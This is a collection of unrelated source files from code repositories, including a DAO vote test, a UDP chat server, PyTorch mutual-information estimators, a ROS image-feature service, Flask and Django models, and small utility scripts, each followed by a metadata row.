    # Vote 1: Agent-forwarded addRecipient call.
    call_script_items = [
        agent_forward(
            [
                (
                    registry.address,
                    registry.addRecipient.encode_input(recipient_candidate, title),
                )
            ]
        )
    ]
    vote_desc_items = ["Add recipient"]
    vote_items = bake_vote_items(vote_desc_items, call_script_items)
    vote_id = create_vote(vote_items, {"from": ldo_holder})[0]
    helpers.execute_vote(
        vote_id=vote_id,
        accounts=accounts,
        dao_voting=dao_voting,
        skip_time=3 * 60 * 60 * 24,
    )
    assert registry.isRecipientAllowed(recipient_candidate)
    assert len(registry.getAllowedRecipients()) == recipients_length_before + 1, 'Wrong whitelist length'
    # Vote 2: Agent-forwarded removeRecipient call restores the initial state.
    call_script_items = [
        agent_forward(
            [
                (
                    registry.address,
                    registry.removeRecipient.encode_input(recipient_candidate),
                )
            ]
        )
    ]
    vote_desc_items = ["Remove recipient"]
    vote_items = bake_vote_items(vote_desc_items, call_script_items)
    vote_id = create_vote(vote_items, {"from": ldo_holder})[0]
    helpers.execute_vote(
        vote_id=vote_id,
        accounts=accounts,
        dao_voting=dao_voting,
        skip_time=3 * 60 * 60 * 24,
    )
    assert not registry.isRecipientAllowed(recipient_candidate)
    assert len(registry.getAllowedRecipients()) == recipients_length_before, 'Wrong whitelist length'
| lidofinance/scripts | archive/tests/test_2023_01_31.py | test_2023_01_31.py | py | 12,625 | python | en | code | 14 | github-code | 36 |
21886050699 | # %% [markdown]
# Perl map functions
# %%
def solution(A, B):
    """Find the smallest "fair" index of A and B and print the result.

    An index i is fair when the prefix sums A[0..i] and B[0..i] are equal.
    Fixes over the original: no ValueError when no fair index exists (min of
    an empty list), no KeyError when the lists have different lengths, and
    the leftover per-index debug print is removed.

    :param A: first sequence of numbers
    :param B: second sequence of numbers
    :return: smallest fair index, or None if the prefix sums never match
    """
    prefix_a = {}
    prefix_b = {}
    sum_a = 0
    sum_b = 0
    # Only the common length can be compared, so unequal-length inputs are safe.
    for i in range(min(len(A), len(B))):
        sum_a += A[i]
        sum_b += B[i]
        prefix_a[i] = sum_a
        prefix_b[i] = sum_b
    fair_indices = [i for i in prefix_a if prefix_a[i] == prefix_b[i]]
    fair = min(fair_indices) if fair_indices else None
    print(prefix_a, prefix_b, fair)
    return fair
# Example input: prefix sums (3, 5, 11) vs (4, 5, 11) first match at index 1.
A = [3, 2, 6]
B = [4, 1, 6]
solution(A,B)
| ashwanijha/pythonCodes | FAIRNumber.PY | FAIRNumber.PY | py | 518 | python | en | code | 0 | github-code | 36 |
31803136505 | import socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_socket.bind(("127.0.0.1", 5050))
print ("Server started")
registered=[]
def new_client(message, caddr):
    """Handle one decoded UDP datagram from client address `caddr`.

    Text protocol:
      * "Signin <name>"  - register the sender and notify everyone else
      * "Signout"        - unregister the sender and notify everyone else
      * "Message <text>" - relay <text> to every registered user

    Mutates the module-level `registered` list and replies via `server_socket`.

    :param message: decoded datagram payload
    :param caddr: (ip, port) tuple of the sender
    """
    print("Connection from: " + str(caddr[0]+":"+str(caddr[1])))
    data = message
    if str(data).startswith('Signin'):
        name = str(data).replace('Signin ', '')
        user = {"name": name, "ip": caddr}
        registered.append(user)
        data = "\n\033[92m(!)\033[0m Registered, welcome \033[92m"+name+"\033[0m"
        print(str(caddr)+" / " + name +" - registered!")
        server_socket.sendto(data.encode(), caddr)
        callback_message = "\n\033[92m(!)\033[0m \033[92m"+name+"\033[0m has signed in"
        for other in registered:
            if other["ip"] != caddr:
                server_socket.sendto(callback_message.encode(), other["ip"])
    elif str(data).startswith('Signout'):
        # FIX: the original removed entries from `registered` while iterating
        # over it and reused the loop variable in a nested loop, which can
        # skip entries. Locate the sender first, then mutate the list.
        sender = next((u for u in registered if u["ip"] == caddr), None)
        if sender is not None:
            registered.remove(sender)
            data = "\n\033[92m(!)\033[0m Signed out, goodbye \033[92m"+sender["name"]+"\033[0m"
            server_socket.sendto(data.encode(), sender["ip"])
            callback_message = "\n\033[92m(!)\033[0m \033[92m"+sender["name"]+"\033[0m has signed out"
            for other in registered:
                if other["ip"] != caddr:
                    server_socket.sendto(callback_message.encode(), other["ip"])
    elif str(data).startswith('Message'):
        text = str(data).replace('Message ', '')
        cnt_received = 0
        delivered = False
        # Only registered senders may broadcast.
        sender = next((u for u in registered if u["ip"] == caddr), None)
        if sender is not None:
            callback_message = "\033[1m"+sender["name"]+":\033[0m "+text
            # Relay to everyone, including the sender (echo confirms delivery).
            for other in registered:
                server_socket.sendto(callback_message.encode(), other["ip"])
                cnt_received += 1
            delivered = True
        if cnt_received == 0:
            msg = "\n\033[91m(!)\033[0m No users online\n"
            server_socket.sendto(msg.encode(), caddr)
        if not delivered:
            msg = "\n\033[91m(!)\033[0m Message not delivered\n"
            server_socket.sendto(msg.encode(), caddr)
# Main receive loop: block for the next datagram (max 1024 bytes) and dispatch it.
while True:
    message, address = server_socket.recvfrom(1024)
    new_client(message.decode(), address)
| root-dm/python-socket | udp/server.py | server.py | py | 2,343 | python | en | code | 0 | github-code | 36 |
6415147937 | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 15 18:08:59 2021
@author: Chris
"""
#%% Imports
from PIL import ImageGrab
import win32gui
import numpy as np
import time
import cv2
#%% Get the ID of the Emulator window
# List to hold window information
window = []
# Name of the window to find
window_name = "Super Street Fighter II (USA) - Snes9x 1.60"
# Function to extract emulator window information
# Given a window and checks if its visible and if it matches the required name
# IF the above are true then we add the information to the window list
def winEnumHandler(hwnd, ctx, window_name=window_name):
    """EnumWindows callback: record the visible window matching `window_name`.

    Appends the handle and title to the module-level `window` list.
    Prints every visible window title as a debugging aid.
    """
    if not win32gui.IsWindowVisible(hwnd):
        return
    title = win32gui.GetWindowText(hwnd)
    print(title)
    if title == window_name:
        window.append(hwnd)
        window.append(title)
# Function to get the screen
# Uses the enumerate windows function from win32gui with our handler to get the
# correct window.
win32gui.EnumWindows(winEnumHandler, None)
#%% Window streaming
# Pixelwise relative corrections for the window bounding box
# (trims the title bar and border so only the emulator viewport is captured)
screen_correction = np.array([-8,-51,8,8])
# Loop to capture the window
while True:
    try:
        # Get the start time
        start_time = time.time()
        # Get the bounding box for the window
        bbox = np.array(win32gui.GetWindowRect(window[0]))
        # Correct the window size
        bbox = tuple(bbox - screen_correction)
        # Get the screen capture
        screen_grab = np.array(ImageGrab.grab(bbox))
        # Prints the time it took to collect the screenshot
        print(f"loop took {time.time()-start_time} seconds")
        # Reset the start time for the next loop
        start_time=time.time()
        # Display the image in a new window
        # (ImageGrab returns RGB; OpenCV expects BGR, hence the conversion)
        cv2.imshow("window", cv2.cvtColor(screen_grab, cv2.COLOR_BGR2RGB))
        # Checks to see if window should be closed and loop stopped
        if cv2.waitKey(25) & 0xFF == ord('q'):
            cv2.destroyAllWindows()
            break
    except Exception as e:
        # Keep streaming even if one grab fails (e.g. window moved/closed).
        print("error", e)
| qchrisd/StreetFighterBot | ScreenGrabProof.py | ScreenGrabProof.py | py | 2,115 | python | en | code | 0 | github-code | 36 |
39627512703 | import sys
import argparse
from lettuce.bin import main as lettuce_main
from lettuce import world
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from salad.steps.everything import *
from salad.terrains.everything import *
BROWSER_CHOICES = [browser.lower()
for browser in DesiredCapabilities.__dict__.keys()
if not browser.startswith('_')]
BROWSER_CHOICES.sort()
DEFAULT_BROWSER = 'firefox'
class store_driver_and_version(argparse.Action):
    """argparse action parsing 'browser[-version[-platform]]' option values.

    Stores the browser under the option's dest, and the optional version and
    platform parts under the 'version' / 'platform' namespace attributes.
    Underscores in the platform part become spaces.
    """

    drivers = BROWSER_CHOICES

    def __call__(self, parser, namespace, values, option_string=None):
        parts = values.split('-')
        browser = parts[0]
        if browser not in self.drivers:
            choices = ', '.join(map(repr, self.drivers))
            raise argparse.ArgumentError(
                self,
                'invalid choice: %r (choose from %s)' % (browser, choices))
        setattr(namespace, self.dest, browser)
        if len(parts) > 1:
            setattr(namespace, 'version', parts[1])
        if len(parts) > 2:
            setattr(namespace, 'platform', parts[2].replace('_', ' '))
def main(args=sys.argv[1:]):
    """Parse Salad's browser options, stash them on lettuce's ``world``,
    and forward every unrecognized argument to lettuce's own CLI."""
    parser = argparse.ArgumentParser(prog="Salad",
                                     description=("BDD browswer-automation "
                                                  "made tasty."))
    parser.add_argument('--browser', default=DEFAULT_BROWSER,
                        action=store_driver_and_version, metavar='BROWSER',
                        help=('Browser to use. Options: %s Default is %s.' %
                              (BROWSER_CHOICES, DEFAULT_BROWSER)))
    parser.add_argument('--remote-url',
                        help='Selenium server url for remote browsers')
    parser.add_argument('--name',
                        help=('Give your job a name so it '
                              'can be identified on saucelabs'))
    parser.add_argument('--timeout',
                        help=("Set the saucelabs' idle-timeout for the job"))
    # Unknown args end up in `leftovers` and are handed to lettuce untouched.
    (parsed_args, leftovers) = parser.parse_known_args()
    world.drivers = [parsed_args.browser]
    world.remote_url = parsed_args.remote_url
    world.remote_capabilities = {}
    # 'version'/'platform' exist on the namespace only when the
    # store_driver_and_version action parsed them out of --browser.
    if 'version' in parsed_args:
        world.remote_capabilities['version'] = parsed_args.version
    if 'platform' in parsed_args:
        world.remote_capabilities['platform'] = parsed_args.platform
    # Job name shown on Sauce Labs: timestamp plus the user-supplied name.
    name = _get_current_timestamp() + " - "
    if not parsed_args.name:
        name += "unnamed job"
    else:
        name += parsed_args.name
    world.remote_capabilities['name'] = name
    # Default idle timeout of 120 seconds unless overridden.
    if not parsed_args.timeout:
        world.remote_capabilities['idle-timeout'] = 120
    else:
        world.remote_capabilities['idle-timeout'] = parsed_args.timeout
    lettuce_main(args=leftovers)
def _get_current_timestamp():
from time import strftime
import datetime
return datetime.datetime.strftime(datetime.datetime.now(),
'%d.%m.%Y %H:%M')
if __name__ == '__main__':
main()
| salad/salad | salad/cli.py | cli.py | py | 3,130 | python | en | code | 122 | github-code | 36 |
39671693100 | import discord
from discord.ext import commands
import time
import json
import os
if not os.path.isfile('config.json'):
    # FIX: `exit` was referenced without being called, so a missing config
    # file silently fell through to the open() below; abort explicitly.
    raise SystemExit('config.json not found')

# Load bot configuration; the context manager closes the file (the old code
# left the handle open for the whole process lifetime).
with open('config.json') as f:
    data = json.load(f)

TOKEN = data['token']
# Guild ids come in as strings; normalize them to ints up front.
servers = [int(server) for server in data['servers']]
message = data['message']
delay = int(data['delay'])
bot = discord.Client(token=TOKEN)
@bot.event
async def on_guild_channel_create(channel):
    """Greet a newly created channel on configured guilds after `delay` seconds."""
    if channel.guild.id in servers:
        print(channel, "had just been created")
        # FIX: time.sleep() blocks the entire discord event loop for the
        # duration of the delay; sleep asynchronously instead.
        import asyncio
        await asyncio.sleep(delay)
        await channel.send(message)
bot.run(TOKEN) | skiteskopes/discord_channel_create_auto_messager | discord_bot.py | discord_bot.py | py | 593 | python | en | code | 0 | github-code | 36 |
2962922987 | #! /usr/bin/env python
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge, CvBridgeError
import cv2
import rospy
import subprocess
#from PIL import Image # PIL
from __init__ import *
from rgiro_spco2_slam.srv import spco_data_image,spco_data_imageResponse
import spco2_placescnn as places365
class ImageFeatureServer():
    """ROS service node: caches the newest camera frame and, on request,
    runs Places365 on it, appending the scene-feature vector (and
    optionally the raw image) under DATA_FOLDER."""

    def image_server(self, req):
        """Service callback: featurize the cached frame for request `req`.

        Returns spco_data_imageResponse(False) when no frame has arrived yet,
        True once the feature row (and optional JPEG) has been written.
        """
        if len(self.frame) == 0:
            # No camera frame received yet.
            return spco_data_imageResponse(False)
        #cv2.imshow("image", self.frame)
        # forward pass through Places365 (PIL conversion -> transform -> CNN)
        convert_img = places365.Image.fromarray(self.frame)#convert into PIL
        input_img = places365.V(self.tf(convert_img).unsqueeze(0))
        logit = self.model.forward(input_img)
        h_x = places365.F.softmax(logit, 1).data.squeeze()
        # save image feature: one comma-separated row appended per request
        fp = open(self.DATA_FOLDER + '/img/ft' + str(req.count) + '.csv','a')
        h_x_numpy = h_x.to('cpu').detach().numpy().copy()
        fp.write(','.join(map(str, h_x_numpy)))
        fp.write('\n')
        fp.close()
        rospy.loginfo("[Service] save new feature")
        # save image
        if self.image_save:
            if req.mode == "new":
                # First request of a trial: create the image directory.
                p = subprocess.Popen("mkdir " + self.DATA_FOLDER + "/image/", shell=True)
                rospy.sleep(0.5)
            image_name = self.DATA_FOLDER + "/image/" + str(req.count) + ".jpg"
            cv2.imwrite(image_name, self.frame)
            rospy.loginfo("[Service spco_data/image] save new image as %s", image_name)
        # save and publish activation image
        #print "h_x",h_x
        probs, idx = h_x.sort(0, True)
        probs = probs.numpy()
        idx = idx.numpy()
        # generate class activation mapping
        #print('Class activation map is saved as cam.jpg')
        #CAMs = places365.returnCAM(features_blobs[0], weight_softmax, [idx[0]])
        # render the CAM and output
        #img = cv2.imread('test.jpg')
        '''
        height, width, _ = self.frame.shape# img.shape
        heatmap = cv2.applyColorMap(cv2.resize(CAMs[0],(width, height)), cv2.COLORMAP_JET)
        result = heatmap * 0.4 + img * 0.5
        image_name = self.DATA_FOLDER + "/image/" + str(req.count) + "_activation.jpg"
        cv2.imwrite(image_name, result)
        '''
        return spco_data_imageResponse(True)

    def image_callback(self, image):
        """Cache the newest compressed camera frame as an OpenCV image."""
        try:
            self.frame = CvBridge().compressed_imgmsg_to_cv2(image)
        except CvBridgeError as e:
            # FIX: was `except CvBrideError` (typo) which raised a NameError
            # instead of catching conversion failures.
            print (e)

    def load_network_model(self):
        """Load Places365 labels, model, input transform and softmax weights."""
        # load the labels
        self.classes, self.labels_IO, self.labels_attribute, self.W_attribute = places365.load_labels()
        # load the model
        self.model = places365.load_model()
        # load the transformer
        self.tf = places365.returnTF() # image transformer
        # get the softmax weight (negative weights clipped for CAM rendering)
        self.params = list(self.model.parameters())
        self.weight_softmax = self.params[-2].data.numpy()
        self.weight_softmax[self.weight_softmax<0] = 0
        return (True)

    def __init__(self):
        TRIALNAME = "test"#rospy.get_param('~trial_name')#test
        IMAGE_TOPIC = '/hsrb/head_rgbd_sensor/rgb/image_rect_color/compressed' #"/hsrb/head_rgbd_sensor/rgb/image_raw"#rospy.get_param('~image_topic')#/camera/rgb/image_raw
        self.image_save = True #rospy.get_param('~image_save')#true
        # subscribe to the compressed camera image topic
        rospy.Subscriber(IMAGE_TOPIC, CompressedImage, self.image_callback, queue_size=1)
        if self.load_network_model()==False:
            print ("error")
        self.DATA_FOLDER = datafolder + TRIALNAME
        self.frame = []
        s = rospy.Service('rgiro_spco2_slam/image', spco_data_image, self.image_server)
        rospy.loginfo("[Service spco_data/image] Ready")
rospy.loginfo("[Service spco_data/image] Ready")
if __name__ == "__main__":
rospy.init_node('spco2_image_features',anonymous=False)
srv = ImageFeatureServer()
rospy.spin()
| Shoichi-Hasegawa0628/spco2_boo | rgiro_spco2_slam/src/spco2_image_features.py | spco2_image_features.py | py | 3,939 | python | en | code | 2 | github-code | 36 |
70345443943 | import numpy as np
import math
import torch
import torch.nn as nn
class Upper(nn.Module):  # Upper: Mutual Information Contrastive Learning Upper Bound
    '''
    Estimates an upper bound on I(X, Y) via a variational Gaussian q(Y|X).

    Methods:
        forward()   : upper-bound estimate from sample batches
        loglikeli() : log-likelihood of the approximation q(Y|X)

    Arguments:
        x_dim, y_dim : dimensionality of samples from X and Y
        hidden_size  : hidden-layer width of the q(Y|X) network
        x_samples, y_samples : tensors of shape [sample_size, x_dim/y_dim]
    '''
    def __init__(self, x_dim, y_dim, hidden_size):
        super(Upper, self).__init__()
        half = hidden_size // 2
        # p_mu: mean of the Gaussian q(Y|X)
        self.p_mu = nn.Sequential(nn.Linear(x_dim, half),
                                  nn.ReLU(),
                                  nn.Linear(half, y_dim))
        # p_logvar: log-variance of q(Y|X); tanh keeps it bounded
        self.p_logvar = nn.Sequential(nn.Linear(x_dim, half),
                                      nn.ReLU(),
                                      nn.Linear(half, y_dim),
                                      nn.Tanh())

    def get_mu_logvar(self, x_samples):
        return self.p_mu(x_samples), self.p_logvar(x_samples)

    def forward(self, x_samples, y_samples):
        mu, logvar = self.get_mu_logvar(x_samples)
        var = logvar.exp()
        # log-density of each positive (paired) sample under q(Y|X)
        positive = -(mu - y_samples) ** 2 / 2. / var
        # pair every prediction with every y to score negative samples
        pred = mu.unsqueeze(1)           # [nsample, 1, dim]
        all_y = y_samples.unsqueeze(0)   # [1, nsample, dim]
        negative = -((all_y - pred) ** 2).mean(dim=1) / 2. / var
        return (positive.sum(dim=-1) - negative.sum(dim=-1)).mean()

    def loglikeli(self, x_samples, y_samples):  # unnormalized loglikelihood
        mu, logvar = self.get_mu_logvar(x_samples)
        return (-(mu - y_samples) ** 2 / logvar.exp() - logvar).sum(dim=1).mean(dim=0)

    def learning_loss(self, x_samples, y_samples):
        return -self.loglikeli(x_samples, y_samples)
class Lower(nn.Module):
    """MINE-style lower bound on I(X, Y) using a critic network F(x, y)."""
    def __init__(self, x_dim, y_dim, hidden_size):
        super(Lower, self).__init__()
        # Critic scoring concatenated (x, y) pairs.
        self.F_func = nn.Sequential(nn.Linear(x_dim + y_dim, hidden_size),
                                    nn.ReLU(),
                                    nn.Linear(hidden_size, 1))

    def forward(self, x_samples, y_samples):
        batch = y_samples.shape[0]
        # All cross pairs (x_i, y_j) serve as negative samples.
        x_grid = x_samples.unsqueeze(0).repeat((batch, 1, 1))
        y_grid = y_samples.unsqueeze(1).repeat((1, batch, 1))
        T0 = self.F_func(torch.cat([x_samples, y_samples], dim=-1))
        T1 = self.F_func(torch.cat([x_grid, y_grid], dim=-1)) - 1.  # [batch, batch, 1]
        return T0.mean() - (T1.logsumexp(dim=1) - np.log(batch)).exp().mean()

    def learning_loss(self, x_samples, y_samples):
        return -self.forward(x_samples, y_samples)
| joey-wang123/Semi-meta | mi_estimators.py | mi_estimators.py | py | 3,452 | python | en | code | 0 | github-code | 36 |
20504076743 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Filename : kalao_pump_switch.sh
# @Date : 2023-01-12-14-12
# @Project: KalAO-ICS
# @AUTHOR : Janis Hagelberg
"""
kalao_pump_switch.py is part of the KalAO Instrument Control Software it is a maintenance script used to switch
the water cooling pump from on to off and opposite.
(KalAO-ICS).
"""
from kalao.plc import temperature_control
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--on', help='Turn pump ON', action='store_true')
parser.add_argument('--off', dest='on', action='store_false')
parser.set_defaults(feature=False)
args = parser.parse_args()
#if temperature_control.pump_status() == 'ON':
if args.on:
print("Switching pump ON")
temperature_control.pump_on()
else:
print("Switching pump OFF")
temperature_control.pump_off()
| janis-hag/kalao-ics | scripts/kalao_pump_switch.py | kalao_pump_switch.py | py | 907 | python | en | code | 0 | github-code | 36 |
26166182256 | from State import State
class Parser:
    """Static parsers for the search-problem input files and CLI args."""

    @staticmethod
    def parse_state_space_file(file_path):
        '''Parses state space file

        Args:
            file_path (string): String to state space file.

        Returns:
            tuple: (start_state, final_state, transition)
        '''
        start_state = final_state = None
        transition = {}
        line_num = -1
        # `with` guarantees the file is closed (the old code leaked handles
        # on exceptions); blank lines and '#'-comments are skipped.
        with open(file_path) as state_space_file:
            for line in state_space_file:
                stripped = line.strip()
                if not stripped or stripped.startswith('#'):
                    continue
                line_num += 1
                if line_num == 0:
                    # First data line: the initial state.
                    start_state = stripped
                elif line_num == 1:
                    # Second data line: space-separated goal states.
                    final_state = stripped.split(' ')
                else:
                    # "state: succ1,cost1 succ2,cost2 ..."
                    begin_state, _, successors = stripped.partition(':')
                    if successors == '':
                        continue
                    for token in successors.strip().split(" "):
                        state_name, cost = token.split(',')
                        transition.setdefault(begin_state, []).append(
                            State(state_name, float(cost)))
                    # Keep successors deterministically ordered by state name.
                    transition[begin_state] = sorted(
                        transition[begin_state], key=lambda p: p.state)
        return (start_state, final_state, transition)

    @staticmethod
    def parse_heuristic_value_file(file_path):
        """Parses heuristic value file

        Args:
            file_path (string): String to state space file.

        Returns:
            dictioniary: Heuristics dictioniary
        """
        heuristics = {}
        with open(file_path) as heuristics_file:
            for line in heuristics_file:
                stripped = line.strip()
                # FIX: the old check `line[1] == '#'` looked at the *second*
                # character, so ordinary '# ...' comment lines crashed the
                # parser; match the state-space parser's comment handling.
                if not stripped or stripped.startswith('#'):
                    continue
                name, _, value = stripped.partition(":")
                heuristics[name] = float(value.strip())
        return heuristics

    @staticmethod
    def parse_args(args):
        """Parses arguments of solution.py

        Args:
            args (list): List of arguments passed into solution.py.

        Returns:
            tuple: (alg, ss, h, optimistic, consistent)
        """
        alg = ss = h = optimistic = consistent = None
        flag = None
        for arg in args:
            if '--' in arg:
                # A new flag; the two --check-* flags are boolean switches.
                flag = arg
                if flag == '--check-optimistic':
                    optimistic = True
                elif flag == '--check-consistent':
                    consistent = True
            else:
                # A value belonging to the most recent value-taking flag.
                if flag == '--alg':
                    alg = arg
                elif flag == '--ss':
                    ss = arg
                elif flag == '--h':
                    h = arg
        return (alg, ss, h, optimistic, consistent)
73387258343 | from datetime import datetime
from __init__ import db
from flask_login import UserMixin
from sqlalchemy.sql import func
class OrganizerEvent(db.Model):
    # Association table linking an organizer (User) to an Event they manage.
    id = db.Column(db.Integer, primary_key=True)
    organizer_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    event_id = db.Column(db.Integer, db.ForeignKey('event.id'), nullable=False)
class User(db.Model,UserMixin):
    # Account record; UserMixin supplies the Flask-Login session interface.
    id = db.Column(db.Integer, primary_key=True)
    firstname = db.Column(db.String(50), nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)
    # NOTE(review): presumably a password *hash* — confirm hashing at write site.
    password = db.Column(db.String(255), nullable=False)
    # Distinguishes event organizers from regular attendees.
    is_organizer = db.Column(db.Boolean, default=False)
    tickets = db.relationship('Ticket', backref='attendee', lazy=True)
class Event(db.Model):
    # An event that attendees can buy tickets for.
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(100), nullable=False)
    description = db.Column(db.String(500), nullable=False)
    venue = db.Column(db.String(100), nullable=False)
    # Defaults to the DB server's current time on insert.
    date = db.Column(db.DateTime(timezone=True), default=func.now())
    capacity = db.Column(db.Integer, nullable=False)
    tickets = db.relationship('Ticket', backref='event', lazy=True)
class Ticket(db.Model):
    # A single admission: one attendee, one event, one unique barcode.
    id = db.Column(db.Integer, primary_key=True)
    barcode = db.Column(db.String(25), nullable=False, unique=True)
    attendee_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    event_id = db.Column(db.Integer, db.ForeignKey('event.id'), nullable=False)
| ntoghrul/Evento | models.py | models.py | py | 1,496 | python | en | code | 0 | github-code | 36 |
23420924440 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
# Auto-generated Django migration: relabels/retypes fields on `comanda`
# and `venta`. Generated code — avoid hand-editing beyond comments.
class Migration(migrations.Migration):

    dependencies = [
        ('ventas', '0048_auto_20160928_0742'),
    ]

    operations = [
        migrations.AlterField(
            model_name='comanda',
            name='area_encargada',
            field=models.CharField(max_length=3, verbose_name=b'Area Encargada', choices=[(b'COC', b'Cocina'), (b'BAR', b'Barra')]),
        ),
        migrations.AlterField(
            model_name='comanda',
            name='estado_comanda',
            field=models.CharField(max_length=3, verbose_name=b'Estado Comanda', choices=[(b'PEN', b'Pendiente'), (b'PRO', b'Procesada'), (b'CAN', b'Cancelada')]),
        ),
        migrations.AlterField(
            model_name='comanda',
            name='fecha_hora_pedido_comanda',
            field=models.DateTimeField(verbose_name=b'Fecha/hora Pedido Comanda'),
        ),
        migrations.AlterField(
            model_name='comanda',
            name='fecha_hora_procesamiento_comanda',
            field=models.DateTimeField(null=True, verbose_name=b'Fecha/hora Procesamiento Comanda', blank=True),
        ),
        migrations.AlterField(
            model_name='comanda',
            name='producto_a_elaborar',
            field=models.ForeignKey(verbose_name=b'Producto a Elaborar', to='stock.ProductoCompuesto'),
        ),
        migrations.AlterField(
            model_name='venta',
            name='apertura_caja',
            field=models.ForeignKey(default=1, verbose_name=b'Apertura de Caja', to='ventas.AperturaCaja', help_text=b'Se asigna dependiendo del usuario logueado y de si posee una Apertura de Caja vigente.'),
        ),
        migrations.AlterField(
            model_name='venta',
            name='numero_factura_venta',
            field=models.ForeignKey(related_name='numero_factura', default=1, verbose_name=b'Numero de Factura de la Venta', to='bar.FacturaVenta', help_text=b'El Numero de Factura se asigna al momento de confirmarse la Venta.'),
        ),
    ]
| pmmrpy/SIGB | ventas/migrations/0049_auto_20160930_1114.py | 0049_auto_20160930_1114.py | py | 2,096 | python | es | code | 0 | github-code | 36 |
6035944019 | import matplotlib.pyplot as plt
import pdb
import numpy as np
import csv
import time
def PlotDemo1(a, b):
    """Plot b against a on a single axes and block until the window closes."""
    # FIX: removed dead locals a1/b1 that were assigned and never used.
    fig = plt.figure()
    ax = fig.add_subplot(1, 1, 1)
    ax.plot(a, b)
    plt.show()
def PlotDemo(a, zero):
    """Plot the series `a` together with the reference series `zero`."""
    # FIX: removed dead locals a1/b1 (b1 was never even populated).
    fig = plt.figure()
    ax = fig.add_subplot(1, 1, 1)
    ax.plot(a)
    ax.plot(zero)
    plt.show()
def Run(symbol):
    """Load today's tick CSV for `symbol` and plot percentage change vs. yesterday's close."""
    csv_reader = csv.reader(open("E:/MyGit/PythonStock/获取当数据并画分时图/data/"+time.strftime('%Y%m%d')+"/"+symbol+".csv",'r', encoding='utf-8'))
    #pdb.set_trace()
    # Column 4: current price (header row included, removed further below).
    PICES1 = [row[4] for row in csv_reader]
    csv_reader1 = csv.reader(open("E:/MyGit/PythonStock/获取当数据并画分时图/data/"+time.strftime('%Y%m%d')+"/"+symbol+".csv",'r', encoding='utf-8'))
    TIME1 = [row[10] for row in csv_reader1]
    csv_reader2 = csv.reader(open("E:/MyGit/PythonStock/获取当数据并画分时图/data/"+time.strftime('%Y%m%d')+"/"+symbol+".csv",'r', encoding='utf-8'))
    # Yesterday's close: column 3 of the third row.
    yesterday = [row[3] for row in csv_reader2][2]
    # NOTE(review): csv_reader was fully consumed by the PICES1 comprehension
    # above, so all eight comprehensions below iterate an exhausted reader and
    # always produce empty lists — reopen the file per column if these are needed.
    TIME2 = [row[4] for row in csv_reader]
    PICES3 = [row[5] for row in csv_reader]
    TIME3 = [row[6] for row in csv_reader]
    PICES4 = [row[7] for row in csv_reader]
    TIME4 = [row[8] for row in csv_reader]
    PICES5 = [row[9] for row in csv_reader]
    TIME5 = [row[10] for row in csv_reader]
    print(PICES1)
    print(TIME1)
    print( yesterday)
    print(TIME2)
    print(PICES3)
    print(TIME3)
    print(PICES4)
    print(TIME4)
    print(PICES5)
    print(TIME5)
    #PlotDemo1()
    #res = [x-1 for x in PICES1]
    # NOTE(review): list.remove() returns None, so `a` and `b` are always None;
    # the calls are only for their side effect of dropping the header cells.
    a = PICES1.remove('当前价格')
    b = TIME1.remove('时间')
    print(PICES1)
    # Convert to percent change relative to yesterday's close.
    res = list(map(float,PICES1))
    res = [x-float(yesterday) for x in res]
    res = [x/float(yesterday)*100 for x in res]
    # Flat zero baseline of the same length for the reference line.
    zero = [0 for i in range(len(res))]
    print(zero)
    print(TIME1)
    PlotDemo(res,zero)
if __name__ == '__main__':
Run("300736")
| 2017wxyzwxyz/PythonStock | 获取当日数据并画分时图/画出走势图.py | 画出走势图.py | py | 1,976 | python | en | code | 0 | github-code | 36 |
9587889867 | import os
import csv
from decimal import Decimal
from forex_python.bitcoin import BtcConverter
from forex_python.converter import CurrencyRates
from plugin import plugin, require
FILE_PATH = os.path.abspath(os.path.dirname(__file__))
@require(network=True)
@plugin('currencyconv')
class Currencyconv():
    """
    Convert an amount of money from a currency to another.
    -- Type currencyconv, press enter and follow the instructions!
    """
    def __call__(self, jarvis, s):
        # Interactive flow: ask for an amount, then source/target currencies.
        currencies = self.find_currencies()
        amount = jarvis.input_number('Enter an amount: ')
        from_currency = self.get_currency(jarvis, 'Enter from which currency: ', currencies)
        to_currency = self.get_currency(jarvis, 'Enter to which currency: ', currencies)
        self.currencyconv(jarvis, amount, from_currency, to_currency)

    def currencyconv(self, jarvis, amount, fr, to):
        """
        currencyconv converts the given amount to another currency
        using fore-python
        """
        # Bitcoin uses a dedicated converter; all other pairs go through
        # CurrencyRates. force_decimal avoids float rounding artifacts.
        b = BtcConverter(force_decimal=True)
        c = CurrencyRates(force_decimal=True)
        if (to == "BTC"):
            result = b.convert_to_btc(Decimal(amount), fr)
        elif (fr == "BTC"):
            result = b.convert_btc_to_cur(Decimal(amount), to)
        else:
            result = c.convert(fr, to, Decimal(amount))
        outputText = str(amount) + " " + fr + \
            " are equal to " + str(result) + " " + to
        jarvis.say(outputText)

    def find_currencies(self):
        """
        find_currency creates a dict with the inputs that forex-python accepts
        """
        # Maps country name / currency name / ISO code (upper-cased, first
        # three CSV columns) to the ISO code forex-python expects (column 2).
        with open(os.path.join(FILE_PATH, "../data/currencies.csv"), mode='r') as infile:
            reader = csv.reader(infile)
            mydict = {r.upper(): row[2] for row in reader for r in row[0:3]}
        return mydict

    def get_currency(self, jarvis, prompt, currencies):
        """
        get_currency checks if the input the user gave is valid based
        on the dictionary of find_currencies
        """
        # Re-prompt until the user enters a known country/currency; the user
        # can type 'show help' to list valid codes or 'try again' to retry.
        while True:
            c = jarvis.input(prompt).upper()
            if c in currencies:
                return currencies[c]
            elif c == "show help".upper():
                print(', '.join(set(currencies.values())))
                prompt = 'Please enter a valid country or currency: '
                continue
            elif c == "try again".upper():
                prompt = 'Please enter a valid country or currency: '
                continue
            else:
                prompt = 'Type -show help- to see valid currencies '\
                    'or -try again- to continue: '
| sukeesh/Jarvis | jarviscli/plugins/currency_conv.py | currency_conv.py | py | 2,657 | python | en | code | 2,765 | github-code | 36 |
